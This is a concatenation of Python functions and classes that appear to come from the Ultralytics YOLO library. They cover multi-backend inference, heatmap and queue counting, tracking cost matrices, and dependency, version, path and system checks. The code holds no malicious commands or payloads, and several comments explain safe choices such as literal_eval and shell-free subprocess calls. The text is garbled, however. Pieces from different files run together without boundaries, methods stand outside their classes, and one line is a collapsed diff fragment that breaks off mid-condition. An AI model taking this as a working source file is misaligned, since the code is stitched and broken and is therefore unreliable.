            def callback(request, userdata):
                """Places result in preallocated list using userdata index."""
                results[userdata] = request.results

            # Create AsyncInferQueue, set the callback and start asynchronous inference for each input image
            async_queue = self.ov.runtime.AsyncInferQueue(self.ov_compiled_model)
            async_queue.set_callback(callback)
            for i in range(n):
                # Start async inference with userdata=i to specify the position in results list
                async_queue.start_async(inputs={self.input_name: im[i : i + 1]}, userdata=i)  # keep image as BCHW
            async_queue.wait_all()  # wait for all inference requests to complete
            y = np.concatenate([list(r.values())[0] for r in results])

        else:  # inference_mode = "LATENCY", optimized for fastest first result at batch-size 1
            y = list(self.ov_compiled_model(im).values())

    # TensorRT
    elif self.engine:
        if self.dynamic and im.shape != self.bindings["images"].shape:
            # Dynamic engine: propagate the new input shape and resize the output buffers to match
            if self.is_trt10:
                self.context.set_input_shape("images", im.shape)
                self.bindings["images"] = self.bindings["images"]._replace(shape=im.shape)
                for name in self.output_names:
                    self.bindings[name].data.resize_(tuple(self.context.get_tensor_shape(name)))
            else:
                i = self.model.get_binding_index("images")
                self.context.set_binding_shape(i, im.shape)
                self.bindings["images"] = self.bindings["images"]._replace(shape=im.shape)
                for name in self.output_names:
                    i = self.model.get_binding_index(name)
                    self.bindings[name].data.resize_(tuple(self.context.get_binding_shape(i)))

        s = self.bindings["images"].shape
        assert im.shape == s, f"input size {im.shape} {'>' if self.dynamic else 'not equal to'} max model size {s}"
        self.binding_addrs["images"] = int(im.data_ptr())
        self.context.execute_v2(list(self.binding_addrs.values()))
        y = [self.bindings[x].data for x in sorted(self.output_names)]

    # CoreML
    elif self.coreml:
        im = im[0].cpu().numpy()
        im_pil = Image.fromarray((im * 255).astype("uint8"))
        # im = im.resize((192, 320), Image.BILINEAR)
        y = self.model.predict({"image": im_pil})  # coordinates are xywh normalized
        if "confidence" in y:
            # NOTE: the local 'w' is the image width here, so the model path must come from self.w, which
            # __init__ stores on the instance through self.__dict__.update(locals())
            raise TypeError(
                "Ultralytics only supports inference of non-pipelined CoreML models exported with "
                f"'nms=False', but 'model={self.w}' has an NMS pipeline created by an 'nms=True' export."
            )
            # TODO: CoreML NMS inference handling
            # from ultralytics.utils.ops import xywh2xyxy
            # box = xywh2xyxy(y['coordinates'] * [[w, h, w, h]])  # xyxy pixels
            # conf, cls = y['confidence'].max(1), y['confidence'].argmax(1).astype(np.float32)
            # y = np.concatenate((box, conf.reshape(-1, 1), cls.reshape(-1, 1)), 1)
        elif len(y) == 1:  # classification model
            y = list(y.values())
        elif len(y) == 2:  # segmentation model
            y = list(reversed(y.values()))  # reversed for segmentation models (pred, proto)

    # PaddlePaddle
    elif self.paddle:
        im = im.cpu().numpy().astype(np.float32)
        self.input_handle.copy_from_cpu(im)
        self.predictor.run()
        y = [self.predictor.get_output_handle(x).copy_to_cpu() for x in self.output_names]

    # MNN
    elif self.mnn:
        input_var = self.torch_to_mnn(im)
        output_var = self.net.onForward([input_var])
        y = [x.read() for x in output_var]

    # NCNN
    elif self.ncnn:
        mat_in = self.pyncnn.Mat(im[0].cpu().numpy())
        with self.net.create_extractor() as ex:
            ex.input(self.net.input_names()[0], mat_in)
            # WARNING: 'output_names' sorted as a temporary fix for https://github.com/pnnx/pnnx/issues/130
            y = [np.array(ex.extract(x)[1])[None] for x in sorted(self.net.output_names())]

    # NVIDIA Triton Inference Server
    elif self.triton:
        im = im.cpu().numpy()  # torch to numpy
        y = self.model(im)

    # TensorFlow (SavedModel, GraphDef, Lite, Edge TPU)
    else:
        im = im.cpu().numpy()
        if self.saved_model:  # SavedModel
            y = self.model(im, training=False) if self.keras else self.model(im)
            if not isinstance(y, list):
                y = [y]
        elif self.pb:  # GraphDef
            y = self.frozen_func(x=self.tf.constant(im))
        else:  # Lite or Edge TPU
            details = self.input_details[0]
            is_int = details["dtype"] in {np.int8, np.int16}  # is TFLite quantized int8 or int16 model
            if is_int:
                scale, zero_point = details["quantization"]
                im = (im / scale + zero_point).astype(details["dtype"])  # de-scale
            self.interpreter.set_tensor(details["index"], im)
            self.interpreter.invoke()
            y = []
            for output in self.output_details:
                x = self.interpreter.get_tensor(output["index"])
                if is_int:
                    scale, zero_point = output["quantization"]
                    x = (x.astype(np.float32) - zero_point) * scale  # re-scale
                if x.ndim == 3:  # if task is not classification, excluding masks (ndim=4) as well
                    # Denormalize xywh by image size. See https://github.com/ultralytics/ultralytics/pull/1695
                    # xywh are normalized in TFLite/EdgeTPU to mitigate quantization error of integer models
                    if x.shape[-1] == 6:  # end-to-end model
                        x[:, :, [0, 2]] *= w
                        x[:, :, [1, 3]] *= h
                    else:
                        x[:, [0, 2]] *= w
                        x[:, [1, 3]] *= h
                        if self.task == "pose":
                            x[:, 5::3] *= w
                            x[:, 6::3] *= h
                y.append(x)
        # TF segment fixes: export is reversed vs ONNX export and protos are transposed
        if len(y) == 2:  # segment with (det, proto) output order reversed
            if len(y[1].shape) != 4:
                y = list(reversed(y))  # should be y = (1, 116, 8400), (1, 160, 160, 32)
            if y[1].shape[-1] == 6:  # end-to-end model
                y = [y[1]]
            else:
                y[1] = np.transpose(y[1], (0, 3, 1, 2))  # should be y = (1, 116, 8400), (1, 32, 160, 160)
        y = [x if isinstance(x, np.ndarray) else x.numpy() for x in y]

    if isinstance(y, (list, tuple)):
        if len(self.names) == 999 and (self.task == "segment" or len(y) == 2):  # segments and names not defined
            nc = y[0].shape[1] - y[1].shape[1] - 4  # y = (1, 32, 160, 160), (1, 116, 8400)
            self.names = {i: f"class{i}" for i in range(nc)}
        return self.from_numpy(y[0]) if len(y) == 1 else [self.from_numpy(x) for x in y]
    else:
        return self.from_numpy(y)
def warmup(self, imgsz=(1, 3, 640, 640)):
    """
    Warm up the model by pushing a dummy tensor through `forward`.

    Nothing is run unless at least one of the warmup-capable backend flags is set and the model is either on a
    non-CPU device or served through Triton. TorchScript models get two passes, every other backend one.

    Args:
        imgsz (tuple): The shape of the dummy input tensor in the format (batch_size, channels, height, width)
    """
    import torchvision  # noqa (import here so torchvision import time not recorded in postprocess time)

    backend_flags = (
        self.pt,
        self.jit,
        self.onnx,
        self.engine,
        self.saved_model,
        self.pb,
        self.triton,
        self.nn_module,
    )
    if not any(backend_flags):
        return
    if self.device.type == "cpu" and not self.triton:
        return  # CPU-only backends are not warmed up unless served by Triton

    dtype = torch.half if self.fp16 else torch.float
    dummy = torch.empty(*imgsz, dtype=dtype, device=self.device)  # uninitialized input, only the shape matters
    passes = 2 if self.jit else 1
    for _ in range(passes):
        self.forward(dummy)  # warmup
class Heatmap(ObjectCounter):
    """
    A class to draw heatmaps in real-time video streams based on object tracks.

    This class extends the ObjectCounter class to generate and visualize heatmaps of object movements in video
    streams. It uses tracked object positions to create a cumulative heatmap effect over time.

    Attributes:
        initialized (bool): Flag indicating whether the heatmap has been initialized.
        colormap (int): OpenCV colormap used for heatmap visualization.
        heatmap (np.ndarray): Array storing the cumulative heatmap data, allocated on the first processed frame.
        annotator (Annotator): Object for drawing annotations on the image.

    Methods:
        heatmap_effect: Calculates and updates the heatmap effect for a given bounding box.
        generate_heatmap: Generates and applies the heatmap effect to each frame.

    Examples:
        >>> from ultralytics.solutions import Heatmap
        >>> heatmap = Heatmap(model="yolov8n.pt", colormap=cv2.COLORMAP_JET)
        >>> frame = cv2.imread("frame.jpg")
        >>> processed_frame = heatmap.generate_heatmap(frame)
    """

    def __init__(self, **kwargs):
        """Initializes the Heatmap class for real-time video stream heatmap generation based on object tracks."""
        super().__init__(**kwargs)

        self.initialized = False  # heatmap buffer is allocated lazily on the first frame
        if self.region is not None:  # check if user provided the region coordinates
            self.initialize_region()

        # store colormap, falling back to PARULA when the config leaves it unset
        self.colormap = cv2.COLORMAP_PARULA if self.CFG["colormap"] is None else self.CFG["colormap"]

    def heatmap_effect(self, box):
        """
        Efficiently calculates heatmap area and effect location for applying colormap.

        Adds 2 to every heatmap cell that lies inside the circle inscribed in the bounding box. The circle centre
        and radius come from the full box, while the updated area is clipped to the heatmap bounds so that boxes
        reaching past the frame edge neither wrap around nor raise a mask shape mismatch.

        Args:
            box (List[float]): Bounding box coordinates [x0, y0, x1, y1].

        Examples:
            >>> heatmap = Heatmap()
            >>> heatmap.generate_heatmap(cv2.imread("image.jpg"))  # allocates heatmap.heatmap
            >>> box = [100, 100, 200, 200]
            >>> heatmap.heatmap_effect(box)
        """
        x0, y0, x1, y1 = map(int, box)
        radius_squared = (min(x1 - x0, y1 - y0) // 2) ** 2
        center_x, center_y = (x0 + x1) // 2, (y0 + y1) // 2

        # Clip the region of interest to the heatmap so slice and mask always share the same shape
        height, width = self.heatmap.shape[:2]
        roi_x0, roi_y0 = max(x0, 0), max(y0, 0)
        roi_x1, roi_y1 = min(x1, width), min(y1, height)
        if roi_x0 >= roi_x1 or roi_y0 >= roi_y1:
            return  # box is empty or entirely outside the frame

        # Create a meshgrid with region of interest (ROI) for vectorized distance calculations
        xv, yv = np.meshgrid(np.arange(roi_x0, roi_x1), np.arange(roi_y0, roi_y1))

        # Calculate squared distances from the center
        dist_squared = (xv - center_x) ** 2 + (yv - center_y) ** 2

        # Create a mask of points within the radius
        within_radius = dist_squared <= radius_squared

        # Update only the values within the bounding box in a single vectorized operation
        self.heatmap[roi_y0:roi_y1, roi_x0:roi_x1][within_radius] += 2

    def generate_heatmap(self, im0):
        """
        Generate heatmap for each frame using Ultralytics.

        Args:
            im0 (np.ndarray): Input image array for processing.

        Returns:
            (np.ndarray): Processed image with heatmap overlay and object counts (if region is specified).

        Examples:
            >>> heatmap = Heatmap()
            >>> im0 = cv2.imread("image.jpg")
            >>> result = heatmap.generate_heatmap(im0)
        """
        if not self.initialized:
            self.heatmap = np.zeros_like(im0, dtype=np.float32)  # same shape as the frame, accumulates over time
            self.initialized = True  # Initialize heatmap only once

        self.annotator = Annotator(im0, line_width=self.line_width)  # Initialize annotator
        self.extract_tracks(im0)  # Extract tracks

        # Iterate over bounding boxes, track ids and classes index
        for box, track_id, cls in zip(self.boxes, self.track_ids, self.clss):
            # Accumulate this box into the heatmap
            self.heatmap_effect(box)

            if self.region is not None:
                self.annotator.draw_region(reg_pts=self.region, color=(104, 0, 123), thickness=self.line_width * 2)
                self.store_tracking_history(track_id, box)  # Store track history
                self.store_classwise_counts(cls)  # store classwise counts in dict
                current_centroid = ((box[0] + box[2]) / 2, (box[1] + box[3]) / 2)
                # Store tracking previous position and perform object counting
                prev_position = None
                if len(self.track_history[track_id]) > 1:
                    prev_position = self.track_history[track_id][-2]
                self.count_objects(current_centroid, track_id, prev_position, cls)  # Perform object counting

        if self.region is not None:
            self.display_counts(im0)  # Display the counts on the frame

        # Normalize, apply colormap to heatmap and combine with original image
        if self.track_data.id is not None:
            im0 = cv2.addWeighted(
                im0,
                0.5,
                cv2.applyColorMap(
                    cv2.normalize(self.heatmap, None, 0, 255, cv2.NORM_MINMAX).astype(np.uint8), self.colormap
                ),
                0.5,
                0,
            )

        self.display_output(im0)  # display output with base class function
        return im0  # return output image for more usage
class QueueManager(BaseSolution):
    """
    Counts tracked objects that are inside a queue region of a video stream.

    Built on BaseSolution: every frame is tracked, annotated, and each tracked object whose latest track point lies
    inside the configured region is added to the per-frame queue count.

    Attributes:
        counts (int): Number of objects counted in the queue for the current frame.
        rect_color (Tuple[int, int, int]): Color used to draw the queue region and the count label background.
        region_length (int): Number of points that define the queue region.
        annotator (Annotator): Drawing helper, re-created for every processed frame.

    Methods:
        process_queue: Annotates one frame and updates the queue count.

    Examples:
        >>> cap = cv2.VideoCapture("Path/to/video/file.mp4")
        >>> queue_manager = QueueManager(region=[(20, 400), (1080, 400), (1080, 360), (20, 360)])
        >>> while cap.isOpened():
        >>>     success, im0 = cap.read()
        >>>     if not success:
        >>>         break
        >>>     out = queue_manager.process_queue(im0)
    """

    def __init__(self, **kwargs):
        """Sets up the base solution, the queue region and the per-frame counting state."""
        super().__init__(**kwargs)
        self.initialize_region()
        self.counts = 0  # objects currently counted in the queue
        self.rect_color = (255, 255, 255)  # region outline color
        self.region_length = len(self.region)  # cached number of region points

    def process_queue(self, im0):
        """
        Annotates a single frame and counts the tracked objects located inside the queue region.

        The count is reset at the start of every call. For each tracked object the box and its track are drawn,
        and the object is counted when the region has at least three points, the object has a previous track
        position, and its latest track point is contained in the region.

        Args:
            im0 (numpy.ndarray): Input image for processing, typically a frame from a video stream.

        Returns:
            (numpy.ndarray): The frame that was passed in, after annotation.

        Examples:
            >>> queue_manager = QueueManager()
            >>> frame = cv2.imread("frame.jpg")
            >>> processed_frame = queue_manager.process_queue(frame)
        """
        self.counts = 0  # fresh count for this frame
        self.annotator = Annotator(im0, line_width=self.line_width)
        self.extract_tracks(im0)

        # Outline the queue region
        region_thickness = self.line_width * 2
        self.annotator.draw_region(reg_pts=self.region, color=self.rect_color, thickness=region_thickness)

        for box, track_id, cls in zip(self.boxes, self.track_ids, self.clss):
            # Box with class label
            self.annotator.box_label(box, label=self.names[cls], color=colors(track_id, True))
            self.store_tracking_history(track_id, box)

            # Centroid and trail of this object
            self.annotator.draw_centroid_and_tracks(
                self.track_line, color=colors(int(track_id), True), track_thickness=self.line_width
            )

            # An object only counts once it has a previous position and its last point is inside the region
            history = self.track_history.get(track_id, [])
            prev_position = history[-2] if len(history) > 1 else None
            if self.region_length < 3 or not prev_position:
                continue
            if self.r_s.contains(self.Point(self.track_line[-1])):
                self.counts += 1

        # Overlay the queue count
        self.annotator.queue_counts_display(
            f"Queue Counts : {str(self.counts)}",
            points=self.region,
            region_color=self.rect_color,
            txt_color=(104, 31, 17),
        )
        self.display_output(im0)  # base class display hook

        return im0
def iou_distance(atracks: list, btracks: list) -> np.ndarray:
    """
    Build an IoU-based cost matrix between two collections of tracks or boxes.

    When the first element of either input is an np.ndarray, both inputs are used as boxes directly. Otherwise each
    track contributes `xywha` if its `angle` is not None, else `xyxy`. Five-element boxes on both sides are scored
    with `batch_probiou`; everything else with `bbox_ioa(..., iou=True)`.

    Args:
        atracks (list[STrack] | list[np.ndarray]): List of tracks 'a' or bounding boxes.
        btracks (list[STrack] | list[np.ndarray]): List of tracks 'b' or bounding boxes.

    Returns:
        (np.ndarray): Cost matrix (1 - IoU) with one row per 'a' entry and one column per 'b' entry.

    Examples:
        Compute IoU distance between two sets of tracks
        >>> atracks = [np.array([0, 0, 10, 10]), np.array([20, 20, 30, 30])]
        >>> btracks = [np.array([5, 5, 15, 15]), np.array([25, 25, 35, 35])]
        >>> cost_matrix = iou_distance(atracks, btracks)
    """

    def _holds_raw_boxes(items):
        """Return True when the collection is non-empty and starts with an np.ndarray."""
        return bool(items) and isinstance(items[0], np.ndarray)

    def _track_box(track):
        """Pick the rotated box when the track carries an angle, the axis-aligned box otherwise."""
        return track.xywha if track.angle is not None else track.xyxy

    if _holds_raw_boxes(atracks) or _holds_raw_boxes(btracks):
        boxes_a, boxes_b = atracks, btracks
    else:
        boxes_a = [_track_box(t) for t in atracks]
        boxes_b = [_track_box(t) for t in btracks]

    ious = np.zeros((len(boxes_a), len(boxes_b)), dtype=np.float32)
    if len(boxes_a) and len(boxes_b):
        rotated = len(boxes_a[0]) == 5 and len(boxes_b[0]) == 5
        arr_a = np.ascontiguousarray(boxes_a, dtype=np.float32)
        arr_b = np.ascontiguousarray(boxes_b, dtype=np.float32)
        if rotated:
            ious = batch_probiou(arr_a, arr_b).numpy()
        else:
            ious = bbox_ioa(arr_a, arr_b, iou=True)
    return 1 - ious  # cost matrix
def fuse_score(cost_matrix: np.ndarray, detections: list) -> np.ndarray:
    """
    Combine an IoU cost matrix with per-detection confidence scores.

    The cost is turned into a similarity (1 - cost), each column is scaled by the score of the matching detection,
    and the result is turned back into a cost. An empty cost matrix is returned unchanged.

    Args:
        cost_matrix (np.ndarray): The matrix containing cost values for assignments, with shape (N, M).
        detections (list[BaseTrack]): List of detections, each containing a score attribute.

    Returns:
        (np.ndarray): Fused cost matrix with shape (N, M).

    Examples:
        Fuse a cost matrix with detection scores
        >>> cost_matrix = np.random.rand(5, 10)  # 5 tracks and 10 detections
        >>> detections = [BaseTrack(score=np.random.rand()) for _ in range(10)]
        >>> fused_matrix = fuse_score(cost_matrix, detections)
    """
    if cost_matrix.size == 0:
        return cost_matrix

    scores = np.array([det.score for det in detections])
    similarity = 1 - cost_matrix
    # A leading axis lets the (M,) scores broadcast across all N rows
    fused_similarity = similarity * scores[np.newaxis, :]
    return 1 - fused_similarity  # fuse_cost
def check_imgsz(imgsz, stride=32, min_dim=1, max_dim=2, floor=0):
    """
    Verify image size is a multiple of the given stride in each dimension. If the image size is not a multiple of the
    stride, update it to the nearest multiple of the stride that is greater than or equal to the given floor value.

    Args:
        imgsz (int | List[int] | Tuple[int] | str): Image size. Strings may be a plain number such as '640' or a
            Python literal such as '[640,640]'.
        stride (int | torch.Tensor): Stride value. For a tensor the maximum element is used.
        min_dim (int): Minimum number of dimensions.
        max_dim (int): Maximum number of dimensions.
        floor (int): Minimum allowed value for image size.

    Returns:
        (int | List[int]): Updated image size. A single int when `min_dim == 1` and only one dimension was given,
            a two-element list when `min_dim == 2` and only one dimension was given, otherwise the list of sizes.

    Raises:
        TypeError: If `imgsz` is not an int, list, tuple or str.
        ValueError: If a string `imgsz` is not a numeric or list/tuple literal, or if more than `max_dim` dimensions
            are given while `max_dim != 1`.
    """
    import ast  # local import, only needed to parse string sizes

    # Convert stride to integer if it is a tensor
    stride = int(stride.max() if isinstance(stride, torch.Tensor) else stride)

    # Convert image size to list if it is an integer
    if isinstance(imgsz, int):
        imgsz = [imgsz]
    elif isinstance(imgsz, (list, tuple)):
        imgsz = list(imgsz)
    elif isinstance(imgsz, str):  # i.e. '640' or '[640,640]'
        if imgsz.isnumeric():
            imgsz = [int(imgsz)]
        else:
            # SECURITY: the string can come straight from the CLI or a config file, so it is parsed as a literal
            # only; eval() would execute arbitrary expressions
            try:
                parsed = ast.literal_eval(imgsz)
            except (ValueError, SyntaxError) as e:
                raise ValueError(
                    f"'imgsz={imgsz}' is not a valid image size. "
                    f"Valid imgsz strings are i.e. 'imgsz=640' or 'imgsz=[640,640]'"
                ) from e
            if isinstance(parsed, (list, tuple)):
                imgsz = list(parsed)  # list, so the 'was it updated' comparison below is list-to-list
            elif isinstance(parsed, (int, float)):
                imgsz = [parsed]
            else:
                raise ValueError(
                    f"'imgsz={imgsz}' is not a valid image size. "
                    f"Valid imgsz strings are i.e. 'imgsz=640' or 'imgsz=[640,640]'"
                )
    else:
        raise TypeError(
            f"'imgsz={imgsz}' is of invalid type {type(imgsz).__name__}. "
            f"Valid imgsz types are int i.e. 'imgsz=640' or list i.e. 'imgsz=[640,640]'"
        )

    # Apply max_dim
    if len(imgsz) > max_dim:
        msg = (
            "'train' and 'val' imgsz must be an integer, while 'predict' and 'export' imgsz may be a [h, w] list "
            "or an integer, i.e. 'yolo export imgsz=640,480' or 'yolo export imgsz=640'"
        )
        if max_dim != 1:
            raise ValueError(f"imgsz={imgsz} is not a valid image size. {msg}")
        LOGGER.warning(f"WARNING ⚠️ updating to 'imgsz={max(imgsz)}'. {msg}")
        imgsz = [max(imgsz)]
    # Make image size a multiple of the stride
    sz = [max(math.ceil(x / stride) * stride, floor) for x in imgsz]

    # Print warning message if image size was updated
    if sz != imgsz:
        LOGGER.warning(f"WARNING ⚠️ imgsz={imgsz} must be multiple of max stride {stride}, updating to {sz}")

    # Add missing dimensions if necessary
    sz = [sz[0], sz[0]] if min_dim == 2 and len(sz) == 1 else sz[0] if min_dim == 1 and len(sz) == 1 else sz

    return sz
+ + Example: + ```python + # Check if current version is exactly 22.04 + check_version(current="22.04", required="==22.04") + + # Check if current version is greater than or equal to 22.04 + check_version(current="22.10", required="22.04") # assumes '>=' inequality if none passed + + # Check if current version is less than or equal to 22.04 + check_version(current="22.04", required="<=22.04") + + # Check if current version is between 20.04 (inclusive) and 22.04 (exclusive) + check_version(current="21.10", required=">20.04,<22.04") + ``` + """ + if not current: # if current is '' or None + LOGGER.warning(f"WARNING ⚠️ invalid check_version({current}, {required}) requested, please check values.") + return True + elif not current[0].isdigit(): # current is package name rather than version string, i.e. current='ultralytics' + try: + name = current # assigned package name to 'name' arg + current = metadata.version(current) # get version string from package name + except metadata.PackageNotFoundError as e: + if hard: + raise ModuleNotFoundError(emojis(f"WARNING ⚠️ {current} package is required but not installed")) from e + else: + return False + + if not required: # if required is '' or None + return True + + if "sys_platform" in required and ( # i.e. 
def check_latest_pypi_version(package_name="ultralytics"):
    """
    Look up the newest released version of a package through the PyPI JSON endpoint.

    Nothing is downloaded or installed. The request uses a 3 second timeout and every failure is swallowed.

    Args:
        package_name (str): The name of the package to find the latest version for.

    Returns:
        (str | None): The latest version of the package, or None when the response status is not 200 or any
            exception is raised during the lookup.
    """
    latest = None
    try:
        requests.packages.urllib3.disable_warnings()  # Disable the InsecureRequestWarning
        reply = requests.get(f"https://pypi.org/pypi/{package_name}/json", timeout=3)
        if reply.status_code == 200:
            latest = reply.json()["info"]["version"]
    except Exception:
        latest = None
    return latest
@ThreadingLocked()
def check_font(font="Arial.ttf"):
    """
    Resolve a font file, looking in the user configuration directory, then the system fonts, then online.

    Args:
        font (str): Path or name of font.

    Returns:
        (Path | str | None): Path of the copy in USER_CONFIG_DIR (existing or freshly downloaded), the first matching
            system font path reported by matplotlib, or None when the download URL is not reachable.
    """
    from matplotlib import font_manager

    font_name = Path(font).name
    local_copy = USER_CONFIG_DIR / font_name

    # 1) A copy already present in the user configuration directory
    if local_copy.exists():
        return local_copy

    # 2) Any system font whose path contains the requested string
    system_hits = [candidate for candidate in font_manager.findSystemFonts() if font in candidate]
    if any(system_hits):
        return system_hits[0]

    # 3) Fetch from the Ultralytics assets release into the user configuration directory
    remote = f"https://github.com/ultralytics/assets/releases/download/v0.0.0/{font_name}"
    if not downloads.is_url(remote, check=True):
        return None
    downloads.safe_download(url=remote, file=local_copy)
    return local_copy
@TryExcept()
def check_requirements(requirements=ROOT.parent / "requirements.txt", exclude=(), install=True, cmds=""):
    """
    Check if installed dependencies meet the given requirements and attempt to auto-update if needed.

    Args:
        requirements (Union[Path, str, List[str]]): Path to a requirements.txt file, a single package requirement as a
            string, or a list of package requirements as strings.
        exclude (Tuple[str]): Tuple of package names to exclude from checking (applied to requirements files).
        install (bool): If True, attempt to auto-update packages that don't meet requirements.
        cmds (str): Additional arguments to pass to the pip install command when auto-updating.

    Returns:
        (bool): True if all requirements are met or were installed successfully, False otherwise.

    Example:
        ```python
        from ultralytics.utils.checks import check_requirements

        # Check a requirements.txt file
        check_requirements("path/to/requirements.txt")

        # Check a single package
        check_requirements("ultralytics>=8.0.0")

        # Check multiple packages
        check_requirements(["numpy", "ultralytics>=8.0.0"])
        ```
    """
    import shlex  # local import: only used to tokenize the optional extra pip arguments

    prefix = colorstr("red", "bold", "requirements:")
    if isinstance(requirements, Path):  # requirements.txt file
        file = requirements.resolve()
        assert file.exists(), f"{prefix} {file} not found, check failed."
        requirements = [f"{x.name}{x.specifier}" for x in parse_requirements(file) if x.name not in exclude]
    elif isinstance(requirements, str):
        requirements = [requirements]

    pkgs = []
    for r in requirements:
        r_stripped = r.split("/")[-1].replace(".git", "")  # replace git+https://org/repo.git -> 'repo'
        match = re.match(r"([a-zA-Z0-9-_]+)([<>!=~]+.*)?", r_stripped)
        name, required = match[1], match[2].strip() if match[2] else ""
        # Explicit boolean check instead of `assert`, which is removed entirely under `python -O`
        try:
            satisfied = check_version(metadata.version(name), required)
        except (AssertionError, metadata.PackageNotFoundError):
            satisfied = False
        if not satisfied:
            pkgs.append(r)

    @Retry(times=2, delay=1)
    def attempt_install(packages, commands):
        """Attempt pip install command with retries on failure."""
        # Argument list (no shell): requirement strings are passed verbatim and cannot be interpreted by a shell
        args = ["pip", "install", "--no-cache-dir", *packages, *shlex.split(commands)]
        return subprocess.check_output(args).decode()

    if pkgs:
        if install and AUTOINSTALL:  # check environment variable
            n = len(pkgs)  # number of packages updates
            LOGGER.info(f"{prefix} Ultralytics requirement{'s' * (n > 1)} {pkgs} not found, attempting AutoUpdate...")
            try:
                t = time.time()
                if not ONLINE:
                    raise ConnectionError("AutoUpdate skipped (offline)")
                LOGGER.info(attempt_install(pkgs, cmds))
                dt = time.time() - t
                LOGGER.info(
                    f"{prefix} AutoUpdate success ✅ {dt:.1f}s, installed {n} package{'s' * (n > 1)}: {pkgs}\n"
                    f"{prefix} ⚠️ {colorstr('bold', 'Restart runtime or rerun command for updates to take effect')}\n"
                )
            except Exception as e:
                LOGGER.warning(f"{prefix} ❌ {e}")
                return False
        else:
            return False

    return True
def check_suffix(file="yolo11n.pt", suffix=".pt", msg=""):
    """
    Verify that one or more file names carry an acceptable suffix.

    Args:
        file (str | Path | list | tuple): File name(s) to check. Falsy values skip the check.
        suffix (str | tuple): Acceptable suffix or collection of suffixes. Falsy values skip the check.
        msg (str): Text prepended to the assertion message.

    Raises:
        AssertionError: If a file has a non-empty suffix that is not among the acceptable ones.
    """
    if not (file and suffix):
        return  # nothing to validate

    allowed = (suffix,) if isinstance(suffix, str) else suffix
    candidates = file if isinstance(file, (list, tuple)) else [file]
    for candidate in candidates:
        ext = Path(candidate).suffix.lower().strip()  # file suffix
        if not ext:
            continue  # names without a suffix are accepted
        assert ext in allowed, f"{msg}{candidate} acceptable suffix is {allowed}, not {ext}"
def check_model_file_from_stem(model="yolov8n"):
    """
    Turn a bare, known model stem into a '.pt' filename; leave every other input untouched.

    Args:
        model (str | Path): Model name. Only suffix-less names whose stem is listed in
            downloads.GITHUB_ASSETS_STEMS are converted.

    Returns:
        (Path | str): Path with a '.pt' suffix for a recognized stem, i.e. yolov8n -> yolov8n.pt, otherwise the
            input unchanged.
    """
    if not model:
        return model

    candidate = Path(model)
    if candidate.suffix:
        return model  # already has a suffix, nothing to add

    if candidate.stem in downloads.GITHUB_ASSETS_STEMS:
        return candidate.with_suffix(".pt")
    return model
def check_is_path_safe(basedir, path):
    """
    Tell whether a path, once resolved, exists and lies inside the intended directory (path traversal guard).

    Args:
        basedir (Path | str): The intended directory.
        path (Path | str): The path to check.

    Returns:
        (bool): True if the resolved path exists and its leading components equal those of the resolved base
            directory, False otherwise.
    """
    root_parts = Path(basedir).resolve().parts
    target = Path(path).resolve()
    if not target.exists():
        return False
    # Component-wise prefix comparison, so '/data2' is not mistaken for a child of '/data'
    return target.parts[: len(root_parts)] == root_parts
def collect_system_info():
    """
    Collect and log relevant system information including OS, Python, RAM, disk, CPU, GPU/CUDA and package versions.

    Every requirement of the 'ultralytics' package is listed with a ✅ / ❌ marker. Unmet or missing requirements are
    reported in the output rather than raised, so the report is always produced in full.

    Returns:
        (dict): The collected information. Contains the system fields, a "Package Info" mapping of requirement name to
            status string, and a "GitHub Info" mapping when running inside GitHub Actions.
    """
    import psutil

    from ultralytics.utils import ENVIRONMENT  # scope to avoid circular import
    from ultralytics.utils.torch_utils import get_cpu_info, get_gpu_info

    gib = 1 << 30  # bytes per GiB
    cuda = torch and torch.cuda.is_available()
    check_yolo()
    total, _, free = shutil.disk_usage("/")

    info_dict = {
        "OS": platform.platform(),
        "Environment": ENVIRONMENT,
        "Python": PYTHON_VERSION,
        "Install": "git" if IS_GIT_DIR else "pip" if IS_PIP_PACKAGE else "other",
        "RAM": f"{psutil.virtual_memory().total / gib:.2f} GB",
        "Disk": f"{(total - free) / gib:.1f}/{total / gib:.1f} GB",
        "CPU": get_cpu_info(),
        "CPU count": os.cpu_count(),
        "GPU": get_gpu_info(index=0) if cuda else None,
        "GPU count": torch.cuda.device_count() if cuda else None,
        "CUDA": torch.version.cuda if cuda else None,
    }
    LOGGER.info("\n" + "\n".join(f"{k:<20}{v}" for k, v in info_dict.items()) + "\n")

    package_info = {}
    for r in parse_requirements(package="ultralytics"):
        try:
            current = metadata.version(r.name)
            # hard=False: with hard=True an unmet requirement raises ModuleNotFoundError, which is not caught below,
            # so the '❌' marker could never be produced and the whole report would abort
            is_met = "✅ " if check_version(current, str(r.specifier), name=r.name, hard=False) else "❌ "
        except metadata.PackageNotFoundError:
            current = "(not installed)"
            is_met = "❌ "
        package_info[r.name] = f"{is_met}{current}{r.specifier}"
        LOGGER.info(f"{r.name:<20}{package_info[r.name]}")

    info_dict["Package Info"] = package_info

    if is_github_action_running():
        github_info = {
            "RUNNER_OS": os.getenv("RUNNER_OS"),
            "GITHUB_EVENT_NAME": os.getenv("GITHUB_EVENT_NAME"),
            "GITHUB_WORKFLOW": os.getenv("GITHUB_WORKFLOW"),
            "GITHUB_ACTOR": os.getenv("GITHUB_ACTOR"),
            "GITHUB_REPOSITORY": os.getenv("GITHUB_REPOSITORY"),
            "GITHUB_REPOSITORY_OWNER": os.getenv("GITHUB_REPOSITORY_OWNER"),
        }
        LOGGER.info("\n" + "\n".join(f"{k}: {v}" for k, v in github_info.items()))
        info_dict["GitHub Info"] = github_info

    return info_dict
def git_describe(path=ROOT):  # path must be a directory
    """
    Return human-readable git description, i.e. v5.0-5-g3e25f1e https://git-scm.com/docs/git-describe.

    Args:
        path (Path | str): Directory inside the git repository to describe.

    Returns:
        (str): Output of `git describe --tags --long --always` with surrounding whitespace removed, or an empty
            string if the command cannot be run or fails.
    """
    try:
        # Argument list instead of a shell string: paths containing spaces or shell metacharacters are passed intact
        output = subprocess.check_output(["git", "-C", str(path), "describe", "--tags", "--long", "--always"])
        return output.decode().strip()  # strip() also handles '\r\n' line endings
    except Exception:
        return ""  # best-effort: not a git repository, git not installed, etc.
def cuda_device_count() -> int:
    """
    Count the NVIDIA GPUs visible in the environment by querying nvidia-smi.

    Returns:
        (int): The GPU count parsed from the first line of the nvidia-smi output, or 0 when the command fails, the
            nvidia-smi executable is not found, or the output is not an integer.
    """
    query = ["nvidia-smi", "--query-gpu=count", "--format=csv,noheader,nounits"]
    try:
        report = subprocess.check_output(query, encoding="utf-8")
